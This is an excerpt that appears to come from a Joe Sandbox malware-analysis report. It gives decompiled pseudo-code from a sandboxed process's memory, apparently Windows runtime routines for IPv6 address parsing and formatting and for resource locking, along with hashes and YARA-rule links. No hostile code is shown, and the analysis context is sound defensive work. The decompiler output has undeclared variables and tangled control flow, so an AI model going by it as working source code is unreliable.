                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: d718099888a1d31df86d87b3d32231f0378f270bd60c53856a165c6c40904f27
                                                    • Instruction ID: b1f03886d129f77af69f5530b3573bf95e5dc52879242d03fd2c5bbac30f6d1a
                                                    • Opcode Fuzzy Hash: d718099888a1d31df86d87b3d32231f0378f270bd60c53856a165c6c40904f27
                                                    • Instruction Fuzzy Hash: 9641EB3169431D7AEF20DAD4DCC9FEAB3BDAF14704F0005A9E605E6085EF719A458F61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02230B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E02230B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02208980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E021FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02230CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02230CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E022306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E022306BA(_t135, _t178) == 0 || E02230A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02230CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02230CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E022306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E022306BA(_t124, _t142) == 0 || E02230A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                    0x02230b21
                                                    0x02230b24
                                                    0x02230b27
                                                    0x02230b2a
                                                    0x02230b2d
                                                    0x02230b30
                                                    0x02230b33
                                                    0x02230b36
                                                    0x02230b39
                                                    0x02230b3e
                                                    0x02230c65
                                                    0x02230c68
                                                    0x02230c6a
                                                    0x02230c6f
                                                    0x0225eb42
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eb48
                                                    0x0225eb48
                                                    0x02230c75
                                                    0x02230c7a
                                                    0x0225eb54
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eb5a
                                                    0x02230c80
                                                    0x02230c84
                                                    0x0225eb98
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eba6
                                                    0x02230cb8
                                                    0x02230cba
                                                    0x02230cd3
                                                    0x02230cda
                                                    0x02230ce4
                                                    0x02230ce9
                                                    0x00000000
                                                    0x02230cec
                                                    0x02230c8c
                                                    0x0225eb63
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eb70
                                                    0x0225eb75
                                                    0x0225eb7d
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eb8c
                                                    0x00000000
                                                    0x0225eb8c
                                                    0x02230c96
                                                    0x00000000
                                                    0x00000000
                                                    0x02230ca2
                                                    0x02230cac
                                                    0x02230cb4
                                                    0x00000000
                                                    0x00000000
                                                    0x02230b44
                                                    0x02230b47
                                                    0x02230b49
                                                    0x00000000
                                                    0x00000000
                                                    0x02230b4f
                                                    0x02230b50
                                                    0x00000000
                                                    0x00000000
                                                    0x02230b56
                                                    0x02230b62
                                                    0x02230b7c
                                                    0x02230bac
                                                    0x02230a0f
                                                    0x0225eaaa
                                                    0x00000000
                                                    0x0225eac4
                                                    0x0225eac4
                                                    0x02230bd0
                                                    0x02230bd0
                                                    0x02230bd4
                                                    0x02230bd9
                                                    0x00000000
                                                    0x00000000
                                                    0x02230bdb
                                                    0x02230be0
                                                    0x0225eb0e
                                                    0x02230a1a
                                                    0x00000000
                                                    0x02230a1a
                                                    0x0225eb1a
                                                    0x0225eb1f
                                                    0x0225eb27
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eb36
                                                    0x00000000
                                                    0x0225eb36
                                                    0x02230bea
                                                    0x00000000
                                                    0x00000000
                                                    0x02230bf6
                                                    0x02230c00
                                                    0x02230c03
                                                    0x02230c0b
                                                    0x00000000
                                                    0x02230c0b
                                                    0x0225eaaa
                                                    0x00000000
                                                    0x02230a15
                                                    0x02230bb6
                                                    0x00000000
                                                    0x02230bc6
                                                    0x02230bc6
                                                    0x02230bcb
                                                    0x02230c15
                                                    0x00000000
                                                    0x00000000
                                                    0x02230c1d
                                                    0x02230c20
                                                    0x02230c21
                                                    0x02230c24
                                                    0x02230c24
                                                    0x02230c26
                                                    0x00000000
                                                    0x02230c26
                                                    0x02230bcd
                                                    0x00000000
                                                    0x02230bcd
                                                    0x02230b89
                                                    0x02230b89
                                                    0x02230b90
                                                    0x00000000
                                                    0x00000000
                                                    0x02230b96
                                                    0x00000000
                                                    0x02230b96
                                                    0x02230a04
                                                    0x02230a04
                                                    0x02230b9a
                                                    0x02230b9a
                                                    0x02230b9b
                                                    0x02230b9f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x02230ba5
                                                    0x02230ac7
                                                    0x02230aca
                                                    0x0225eacf
                                                    0x00000000
                                                    0x0225eade
                                                    0x0225eade
                                                    0x0225eae3
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eaf3
                                                    0x0225eaf6
                                                    0x0225eaf7
                                                    0x0225eafe
                                                    0x0225eb01
                                                    0x00000000
                                                    0x0225eb01
                                                    0x0225eacf
                                                    0x02230ad0
                                                    0x02230ad4
                                                    0x00000000
                                                    0x00000000
                                                    0x02230ada
                                                    0x02230ae6
                                                    0x02230c34
                                                    0x00000000
                                                    0x02230c47
                                                    0x02230c49
                                                    0x02230c4a
                                                    0x02230c4e
                                                    0x02230c51
                                                    0x02230c54
                                                    0x02230c57
                                                    0x02230c5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x02230c60
                                                    0x02230afb
                                                    0x02230afe
                                                    0x02230b02
                                                    0x02230b05
                                                    0x02230b08
                                                    0x00000000
                                                    0x02230b08
                                                    0x02230ae6
                                                    0x02230b44
                                                    0x022309f8
                                                    0x022309f8
                                                    0x022309f9
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eaa0
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: cf7d1ed0b661b976d3c315df47bae200dc360e3ed839d554defde9ce4a3205c4
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: ABA18DB1D2031ADECF26CFE4C8446BEB7B5AF05309F24886AD842A7249D7749B45CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02230554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E02230554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022d01c0;
									_push(_t144);
									_push(0);
									_t51 = E021EF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02234FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02243F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02243F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0227217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02243F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02233915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022d01c0;
												_push(_t138);
												_push(0);
												_t58 = E021EF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02234FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02243F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02243F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0227217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02243F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02233915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02215384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E021EF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02233915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E021EF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02233915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E021EF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02233915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02215329(_t110, _t138);
																_t69 = E022153A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                    0x0223055a
                                                    0x0223055d
                                                    0x02230563
                                                    0x02230566
                                                    0x022305d8
                                                    0x022305e2
                                                    0x022305e5
                                                    0x00000000
                                                    0x022305e7
                                                    0x022305e7
                                                    0x022305ea
                                                    0x022305f3
                                                    0x022305f3
                                                    0x02230568
                                                    0x02230568
                                                    0x02230568
                                                    0x02230569
                                                    0x02230569
                                                    0x02230569
                                                    0x0223056b
                                                    0x00000000
                                                    0x00000000
                                                    0x0225217f
                                                    0x02252183
                                                    0x0225225b
                                                    0x0225225f
                                                    0x02252189
                                                    0x0225218c
                                                    0x0225218f
                                                    0x02252194
                                                    0x02252199
                                                    0x0225219d
                                                    0x022521a0
                                                    0x022521a2
                                                    0x022521ce
                                                    0x022521ce
                                                    0x022521ce
                                                    0x022521d0
                                                    0x022521d6
                                                    0x022521de
                                                    0x022521e2
                                                    0x022521e8
                                                    0x022521e9
                                                    0x022521ec
                                                    0x022521f1
                                                    0x022521f6
                                                    0x00000000
                                                    0x00000000
                                                    0x022521f8
                                                    0x022521fb
                                                    0x02252206
                                                    0x0225220b
                                                    0x0225220c
                                                    0x02252217
                                                    0x02252226
                                                    0x0225222b
                                                    0x0225222c
                                                    0x0225222f
                                                    0x02252232
                                                    0x02252235
                                                    0x02252235
                                                    0x0225223a
                                                    0x0225223f
                                                    0x02252241
                                                    0x02252243
                                                    0x02252248
                                                    0x02252248
                                                    0x0225224d
                                                    0x0225224f
                                                    0x02252262
                                                    0x02252263
                                                    0x02252268
                                                    0x02252269
                                                    0x02252269
                                                    0x02252269
                                                    0x0225226d
                                                    0x00000000
                                                    0x00000000
                                                    0x02252276
                                                    0x02252279
                                                    0x0225227e
                                                    0x02252283
                                                    0x02252287
                                                    0x0225228a
                                                    0x0225228d
                                                    0x0225228f
                                                    0x022522bc
                                                    0x022522bc
                                                    0x022522bc
                                                    0x022522be
                                                    0x022522c4
                                                    0x022522cc
                                                    0x022522d0
                                                    0x022522d6
                                                    0x022522d7
                                                    0x022522da
                                                    0x022522df
                                                    0x022522e4
                                                    0x00000000
                                                    0x00000000
                                                    0x022522e6
                                                    0x022522e9
                                                    0x022522f4
                                                    0x022522f9
                                                    0x022522fa
                                                    0x02252305
                                                    0x02252314
                                                    0x02252319
                                                    0x0225231a
                                                    0x0225231d
                                                    0x02252320
                                                    0x02252323
                                                    0x02252323
                                                    0x02252328
                                                    0x0225232d
                                                    0x0225232f
                                                    0x02252331
                                                    0x02252336
                                                    0x02252336
                                                    0x0225233b
                                                    0x0225233d
                                                    0x02252350
                                                    0x02252351
                                                    0x02252356
                                                    0x02252359
                                                    0x02252359
                                                    0x0225235b
                                                    0x0225235d
                                                    0x02215367
                                                    0x0221536b
                                                    0x02215372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x02252363
                                                    0x02252363
                                                    0x02252369
                                                    0x0225236a
                                                    0x0225236c
                                                    0x02252371
                                                    0x02252373
                                                    0x00000000
                                                    0x02252379
                                                    0x02252379
                                                    0x0225237a
                                                    0x0225237f
                                                    0x0225237f
                                                    0x02252385
                                                    0x02252386
                                                    0x02252389
                                                    0x0225238e
                                                    0x02252390
                                                    0x02215378
                                                    0x0221537c
                                                    0x02252396
                                                    0x02252396
                                                    0x02252397
                                                    0x0225239c
                                                    0x022523a2
                                                    0x022523a3
                                                    0x022523a6
                                                    0x022523ab
                                                    0x022523ad
                                                    0x00000000
                                                    0x022523b3
                                                    0x022523b3
                                                    0x022523b4
                                                    0x022523b9
                                                    0x022523ba
                                                    0x022523ba
                                                    0x022523bc
                                                    0x022523bf
                                                    0x00000000
                                                    0x00000000
                                                    0x02249153
                                                    0x02249158
                                                    0x0224915a
                                                    0x0224915e
                                                    0x02249160
                                                    0x00000000
                                                    0x02249166
                                                    0x02249166
                                                    0x02249171
                                                    0x02249176
                                                    0x02249176
                                                    0x00000000
                                                    0x02249160
                                                    0x022523c6
                                                    0x022523ce
                                                    0x022523d7
                                                    0x022523d7
                                                    0x022523ad
                                                    0x02252390
                                                    0x02252373
                                                    0x0225233f
                                                    0x0225233f
                                                    0x00000000
                                                    0x0225233f
                                                    0x02252291
                                                    0x02252291
                                                    0x02252293
                                                    0x02252295
                                                    0x0225229a
                                                    0x022522a1
                                                    0x022522a3
                                                    0x022522a7
                                                    0x022522a9
                                                    0x00000000
                                                    0x00000000
                                                    0x022522ab
                                                    0x022522ad
                                                    0x022522af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x022522af
                                                    0x022522b1
                                                    0x022522b4
                                                    0x022522b4
                                                    0x022522b6
                                                    0x022153be
                                                    0x022153be
                                                    0x022153be
                                                    0x022153c0
                                                    0x00000000
                                                    0x00000000
                                                    0x022153cb
                                                    0x022153ce
                                                    0x022153d0
                                                    0x022153d4
                                                    0x022153d6
                                                    0x00000000
                                                    0x022153d8
                                                    0x022153e3
                                                    0x022153ea
                                                    0x022153ea
                                                    0x00000000
                                                    0x022153d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x022522b6
                                                    0x00000000
                                                    0x0225228f
                                                    0x02252349
                                                    0x0225234d
                                                    0x02252251
                                                    0x02252251
                                                    0x00000000
                                                    0x02252251
                                                    0x022521a4
                                                    0x022521a4
                                                    0x022521a6
                                                    0x022521a8
                                                    0x022521ac
                                                    0x022521b6
                                                    0x022521b8
                                                    0x022521bc
                                                    0x022521be
                                                    0x00000000
                                                    0x00000000
                                                    0x022521c0
                                                    0x022521c2
                                                    0x022521c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x022521c4
                                                    0x022521c6
                                                    0x022521c6
                                                    0x022521c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x022521c8
                                                    0x022521a2
                                                    0x00000000
                                                    0x02252183
                                                    0x0223057b
                                                    0x0223057d
                                                    0x02230581
                                                    0x02230583
                                                    0x02252178
                                                    0x00000000
                                                    0x02230589
                                                    0x0223058f
                                                    0x0223058f
                                                    0x02230583
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02252206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: a4b8055a5f49a83a834f02612671c20d558ec42956e42e97470b5599df696350
                                                    • Instruction ID: 684ca74920d6636729b2998c22bf27831e94f6fefeb0cb76a6931d68f4fdc06a
                                                    • Opcode Fuzzy Hash: a4b8055a5f49a83a834f02612671c20d558ec42956e42e97470b5599df696350
                                                    • Instruction Fuzzy Hash: E4514875720312ABEB15CE98CC80F6673AAAF84710F21C359ED15DB2C9DB71EC418BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022314C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E022314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x22d2088; // 0x7634c1a7
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02227707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E022313CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02227707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02227707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E021F2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E021FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                    0x022314c0
                                                    0x022314cb
                                                    0x022314d2
